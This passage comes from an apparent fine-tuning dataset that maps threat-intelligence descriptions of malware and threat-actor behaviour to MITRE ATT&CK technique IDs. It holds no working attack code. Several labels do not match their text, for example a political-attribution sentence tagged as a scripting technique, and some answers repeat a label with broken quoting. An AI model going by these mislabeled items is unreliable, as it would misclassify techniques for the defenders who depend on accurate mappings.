"AnyDesk has been the most common legitimate desktop software used to establish an interactive command and control channel, with ConnectWise seen slightly less frequently." }, { "role": "assistant", "content": "T1219 - Remote Access Software', 'T1219 - Remote Access Software" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Denis obfuscates its code and encrypts the API names. Denis also encodes its payload in Base64." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HOPLIGHT has used WMI to recompile the Managed Object Format (MOF) files in the WMI repository." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation CuckooBees, the threat actors used the legitimate Windows services `IKEEXT` and `PrintNotify` to side-load malicious DLLs." }, { "role": "assistant", "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Frankenstein has obtained and used Empire to deploy agents." }, { "role": "assistant", "content": "T1588.002 - Tool" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Turla, also known as Snake, is an infamous espionage group recognized for its complex malware. To confound detection, its operators recently started using PowerShell scripts that provide direct, in-memory loading and execution of malware executables and libraries. This allows them to bypass detection that can trigger when a malicious executable is dropped on disk" }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Operation Wocao's backdoors have been written in Python and compiled with py2exe." }, { "role": "assistant", "content": "T1059.006 - Command and Scripting Interpreter: Python" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This variant has exactly the same features as the previous variant: file listing, OS version getting, process killing, drive listing, execution via ShellExecuteW(), execution via named pipe, cleaning, file removal, file downloading. Here is an example of code similarities on the execution via named pipe function. On the left a sample from Bisonal 2014 and on the right Bisonal 2011" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "contains code to clear event logs." }, { "role": "assistant", "content": "T1070 - Indicator Removal on Host" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation Spalax, the threat actors relied on a victim to click on a malicious link distributed via phishing emails." }, { "role": "assistant", "content": "T1204.001 - Malicious Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FunnyDream can parse the `ProxyServer` string in the Registry to discover http proxies." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After these strings are decrypted, the malware will load a series of Microsoft Windows API calls to be used later on. After these functions are loaded, Comnie determines if it is running within the %TEMP% directory of the victim machine. In the event it is not running within this directory, it will copy itself to %TEMP% and execute this newly created file with an argument of the original file’s path. A total of 64MB of garbage data is appended to this copied file, likely as a way to deter any security products in place that may be scanning files on disk. After running within the %TEMP% path, Comnie will delete the original file. After Comnie has been copied to the %TEMP% directory, it will look for the presence of the ‘DQuit.tmp’ file in this path. It is unclear how this file is used exactly, as it does not appear to ever be written during runtime by Comnie. Comnie continue to enter its installation routine. In doing so, it will attempt to detect the following Anti-Virus products via various techniques" }, { "role": "assistant", "content": "T1027.001 - Obfuscated Files or Information: Binary Padding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "POWRUNER can use HTTP for C2 communications." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ROCKBOOT is a Master Boot Record (MBR) bootkit that uses the MBR to establish persistence." }, { "role": "assistant", "content": "T1542.003 - Bootkit" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT19 used PowerShell commands to execute payloads." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pillowmint has been decompressed by included shellcode prior to being launched." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Credentials that have either been reused across multiple platforms or have previously been exposed. Additionally, this includes VPN accounts - not just domain and local accounts." }, { "role": "assistant", "content": "T1078 - Valid Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Backdoor.Oldrea writes collected data to a temporary file in an encrypted form before exfiltration to a C2 server." }, { "role": "assistant", "content": "T1560 - Archive Collected Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This log contains the external IP, the geographic location, the machine name, the time the machine was infected, as well as fields to be logged in the threat actor’s database" }, { "role": "assistant", "content": "T1070 - Indicator Removal on Host', 'T1124 - System Time Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This location data gives the attacker a unique edge, as they can specify a target country or city to attack and maximize their accuracy when choosing a particular target.   The .txt file contains information about the C2 domain and infected machine, as detected in a Cybereason Lab environment" }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Throughout our StellarParticle investigations, CrowdStrike identified what appeared to be a VBScript-based Active Directory enumeration toolkit. While the script’s contents have not been recovered to date, CrowdStrike has observed identical artifacts across multiple StellarParticle engagements that suggest the same or similar tool was used" }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chimera has used Cobalt Strike C2 beacons for data exfiltration." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation Wocao, threat actors used their own web shells, as well as those previously placed on target systems by other threat actors, for reconnaissance and lateral movement." }, { "role": "assistant", "content": "T1505.003 - Server Software Component: Web Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "esentutl can be used to copy files from a given URL." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "As we can see, it simply downloads a file from secure.dropinbox[.]pw using HTTP on port 443 (not HTTPS), and proceeds to decrypt the file using AES-128 prior to executing it. At this point, Cardinal RAT has been downloaded and executed, and execution is directed to this sample. Of course, the Carp Downloader is not required to download Cardinal RAT, however, based on our visibility, it has exclusively done so" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer', 'T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Agent Tesla has used HTTP for C2 communications." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The dropper extracts the communications and wiper components from resources named “PKCS7” and “PKCS12” respectively, while the x86 sample extracts the x64 variant of Disttrack from a resource named “X509”. To extract the components, the dropper is configured to seek specific offsets within the resource, read a specified number of bytes and decrypt the contents using a specified key. The key exists in the sample as a base64 encoded string that the dropper will decode then use each byte of the resulting string to XOR the data obtained from the resource. When determining the location of the ciphertext within the resource, the dropper subtracts 14 from the offset value in the sample’s configuration as an additional layer of obfuscation. Table 1 shows the resources within the Disttrack x86 sample, the component it contains and the values needed to decrypt its contents." }, { "role": "assistant", "content": "T1132 - Data Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses netstat -ano to search for specific IP address ranges." }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QakBot can use Regsvr32 to execute malicious DLLs." }, { "role": "assistant", "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Fysbis has masqueraded as the rsyncd and dbus-inotifier services." }, { "role": "assistant", "content": "T1036.004 - Masquerading: Masquerade Task or Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GravityRAT executes commands remotely on the infected host." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Metamorfo's C2 communication has been encrypted using OpenSSL." }, { "role": "assistant", "content": "T1573.002 - Asymmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation Wocao, threat actors archived collected files with WinRAR, prior to exfiltration." }, { "role": "assistant", "content": "T1560.001 - Archive Collected Data: Archive via Utility" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pteranodon can use a malicious VBS file for execution." }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "connects to port 80 of a C2 server using Wininet API." }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Metamorfo has communicated with hosts over raw TCP on port 9999." }, { "role": "assistant", "content": "T1571 - Non-Standard Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Unit 42 has discovered activity involving threat actors responsible for the OilRig campaign with a potential link to a threat group known as GreenBug. Symantec first reported on this group back in January 2017, detailing their operations and using a custom information stealing Trojan called ISMDoor" }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BADCALL functions as a proxy server between the victim and C2 server." }, { "role": "assistant", "content": "T1090 - Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bandook has modules that are capable of capturing video from a victim's webcam." }, { "role": "assistant", "content": "T1125 - Video Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "At installation, the MSI file drops three files and creates one hidden directory (UFile) into C:\\ProgramData\\Apple\\Update\\, likely as a ruse" }, { "role": "assistant", "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories', 'T1564.001 - Hide Artifacts: Hidden Files and Directories" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RDAT can download files via DNS." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This account was suspended in short order, but immediately after the suspension, an alternate account with the username @dookhtegan1 with the same stylized profile image appeared and is still currently active" }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery', 'T1087 - Account Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "performs desktop video recording and captures screenshots of the desktop and sends it to the C2 server." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pteranodon can capture screenshots at a configurable interval." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Valak can download a module to search for and build a report of harvested credential data." }, { "role": "assistant", "content": "T1119 - Automated Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has deployed Meterpreter stagers and SplinterRAT instances in the victim network after moving laterally." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT32's backdoor has exfiltrated data using the already opened channel with its C&C server." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A string, that contains a PDB-path to debug symbols, suggests one such tool was named CredRaptor by the attackers. This tool collects saved passwords from various browsers such as Google Chrome, Internet Explorer, Mozilla Firefox, and Opera" }, { "role": "assistant", "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has the capability to retrieve information about shares on remote hosts." }, { "role": "assistant", "content": "T1135 - Network Share Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Web inject – the configuration file for the hooking module Once communication with the C2 is established, one of the additional modules that is downloaded is the web-inject module. It intercepts the victim’s traffic by injecting the module into the browser’s process and hooking the network API. The hooking module gets the execution flow from intercepted APIs, and as soon as the victim accesses certain web pages related to banking and finance, additional JavaScript is injected into the source page" }, { "role": "assistant", "content": "T1185 - Browser Session Hijacking', 'T1059.007 - Command and Scripting Interpreter: JavaScript" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SVR target organisations who supply privileged software to intelligence targets." }, { "role": "assistant", "content": "T1195.002 - Compromise Software Supply Chain" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The script gathers system specific data, such as the domain the system belongs to and the current username, that it constructs in the following format:   \\:pass   The above string is encoded using a custom base64 encoder to strip out non-alphanumeric characters (=, / and +) from the data and replaces them with domain safe values (01, 02 and 03 respectively)" }, { "role": "assistant", "content": "T1132 - Data Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "EnvyScout has been distributed via spearphishing as an email attachment." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TEARDROP was decoded using a custom rolling XOR algorithm to execute a customized Cobalt Strike payload." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "As has been previously reported, there are two variants of the trojan TinkaOTP. The version that has received the most attention contains the malware payload in the application bundle’s Resources folder. The file is a Mach-O binary disguised as a .nib file, at ../Resources/Base.lproj/Submenu.nib. This file is copied directly to the users Library folder and renamed as .mina. The dot prefix is added in order to make it invisible in the Finder" }, { "role": "assistant", "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LazyScripter has used JavaScript in its attacks." }, { "role": "assistant", "content": "T1059.007 - Command and Scripting Interpreter: JavaScript" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Turian can search for specific files and list directories." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The following information is gathered from the endpoint, stored in the file 1.hwp, and sent to the control server" }, { "role": "assistant", "content": "T1074.001 - Data Staged: Local Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "bypasses UAC to escalate privileges by using a custom “RedirectEXE” shim database." }, { "role": "assistant", "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The xmrig mining process joins the supportxmr mining pool using the wallet address 428uyvSqdpVZL7HHgpj2T5SpasCcoHZNTTzE3Lz2H5ZkiMzqayy19sYDcBGDCjoWbTfLBnc3tc9rG4Y8gXQ8fJiP5tqeBda. At the time of writing, the malware campaign has ~25.05 KH/s hashing power and there is 11 XMR (~$1,500) in the wallet" }, { "role": "assistant", "content": "T1496 - Resource Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dragonfly has registered domains for targeting intended victims." }, { "role": "assistant", "content": "T1583.001 - Domains" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "1) Writes itself to %AppData%\\Microsoft\\Word\\log.ps1 2) Sets up persistence for this file, using a run key. 6) Removes all registry entries that are left behind during the dropper process" }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "KONNI has created a shortcut called \"Anti virus service.lnk\" in an apparent attempt to masquerade as a legitimate file." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Fast-paced intrusion • Very stealthy • Rapidly changing tactics • Employed advanced attack techniques 4) 4. All rights reserved.23 Our Response: Tackled Attacker WMI Usage ADVANCED ATTACK TECHNIQUES 24) 24. Captured entire functions of PS scripts, attacker commands, script output, etc. Wrote indicators based on observed attacker activity • Identified lateral movement, unique backdoors, credential theft, data theft, recon, persistence creation, etc. All rights reserved.25 Our Response: Increased PowerShell Visibility ADVANCED ATTACK TECHNIQUES 26) 26. All rights reserved.27 Our Response: Addressed Ticket Attacks ADVANCED ATTACK TECHNIQUES Event ID 4624 Event ID 4672 Event ID 4634 28) 28. All rights reserved.29 BONUS SLIDE: Even More WMI + PS FUN FACT: We saw the attacker test this backdoor before deployment 30) 30" }, { "role": "assistant", "content": "T1550.003 - Use Alternate Authentication Material: Pass the Ticket" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Then extract the image file \"image1.jpeg\" contained in the document. Find the special logo in the picture data, decode the subsequent steganographic PE data, release the randomly named .exe in the %ALLUSERSPROFILE% directory and run it" }, { "role": "assistant", "content": "T1027.003 - Steganography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can be used to find files and directories with native functionality such as dir commands." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TrailBlazer can masquerade its C2 traffic as legitimate Google Notifications HTTP requests." }, { "role": "assistant", "content": "T1001 - Data Obfuscation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "To ensure that the compromised system is unable to restore from backup, REvil deletes shadow copies and disables recovery mode by executing the following command via ShellExecute" }, { "role": "assistant", "content": "T1490 - Inhibit System Recovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SUNSPOT was identified on disk with a filename of taskhostsvc.exe (SHA256 Hash: c45c9bda8db1d470f1fd0dcc346dc449839eb5ce9a948c70369230af0b3ef168), and internally named taskhostw.exe by its developers. It was likely built on 2020-02-20 11:40:02, according to the build timestamp found in the binary, which is consistent with the currently assessed StellarParticle supply chain attack timeline. StellarParticle operators maintained the persistence of SUNSPOT by creating a scheduled task set to execute when the host boots" }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location', 'T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In this latest campaign, APT34 leveraged the recent Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER" }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chrommme can retrieve the username from a targeted system." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Intrusions and campaigns conducted by this group are in-line with PRC goals and self-interest in Taiwan" }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SDBbot has the ability to record video on a compromised host." }, { "role": "assistant", "content": "T1125 - Video Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Recent samples, with the ability to discover wireless network settings and credentials will spawn an instance of netsh.exe after a brief sleeping period (after launch). The syntax utilized initially is" }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Although the activity was previously linked by others to the FIN7 threat actor group, our research suggests the activity is in fact espionage related and unlikely to be FIN7 related" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses the Confuser protector to obfuscate an embedded .Net Framework assembly used for C2. also encodes collected data in hexadecimal format before writing to files on disk and obfuscates strings." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LightNeuron encrypts its configuration files with AES-256." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "For Frankenstein, the threat actors obtained and used Empire." }, { "role": "assistant", "content": "T1588.002 - Tool" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Octopus has been disguised as legitimate programs, such as Java and Telegram Messenger." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The data found within this file is encrypted using a single-byte xor key of 0x41. The file header structure, with the underlying data still encrypted, can be seen below" }, { "role": "assistant", "content": "T1560.003 - Archive via Custom Method" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NETWIRE can use XDG Autostart Entries to establish persistence." }, { 